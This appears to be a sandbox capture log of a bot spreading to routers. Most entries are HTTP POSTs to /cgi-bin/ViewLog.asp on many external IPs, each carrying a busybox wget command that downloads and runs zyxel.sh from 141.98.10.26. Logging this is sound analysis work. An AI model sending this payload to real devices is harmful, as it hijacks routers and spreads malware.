Nov 22, 2023 08:39:12.648327112 CET	10044	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101614952 CET	12401	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:08.960462093 CET	16778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
406	192.168.2.23	46790	31.136.178.48	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.006745100 CET	7936	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.562755108 CET	8047	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.682571888 CET	8175	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.082223892 CET	8439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.689615011 CET	9037	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:12.648327112 CET	10045	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101634979 CET	12401	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:08.960474968 CET	16779	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
407	192.168.2.23	53678	31.136.34.173	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.007148027 CET	7936	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.594729900 CET	8048	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.714575052 CET	8176	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.082225084 CET	8439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.689616919 CET	9037	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:12.648309946 CET	10044	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101639032 CET	12402	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:08.960462093 CET	16778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
408	192.168.2.23	56410	94.143.232.72	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.020826101 CET	7938	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.218065023 CET	7944	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:54 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
409	192.168.2.23	39170	94.79.16.90	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.026150942 CET	7938	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.430922985 CET	8032	IN	HTTP/1.1 401 Unauthorized Server: Web server Date: Wed, 22 Nov 2023 07:38:54 GMT Content-Type: text/html Content-Length: 193 Connection: keep-alive WWW-Authenticate: Digest realm="ZyXEL Keenetic Lite II", nonce="OrFdZTfNYmrhBuAdF9ez7CLk8Tg6K3Qa", qop="auth" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
410	192.168.2.23	42856	62.197.221.186	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.031349897 CET	7939	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.240674973 CET	7945	IN	HTTP/1.0 307 Temporary Redirect Content-Length: 0 Content-Type: text/html Date: Wed, 22 Nov 2023 07:38:55 GMT Expires: Wed, 22 Nov 2023 07:38:55 GMT Server: Mikrotik HttpProxy Proxy-Connection: close Location: http://registracia.b2c.swan.sk

Session ID	Source IP	Source Port	Destination IP	Destination Port
411	192.168.2.23	57360	94.110.185.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.034238100 CET	7940	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
412	192.168.2.23	45224	62.29.59.210	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.045932055 CET	7941	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
413	192.168.2.23	34014	94.121.184.30	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.052782059 CET	7941	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
414	192.168.2.23	51472	31.136.124.196	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:56.498687983 CET	8158	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.066510916 CET	8185	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:58.186395884 CET	8309	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:00.618007898 CET	8672	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:05.225357056 CET	9181	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:14.184165001 CET	10242	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101707935 CET	12403	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
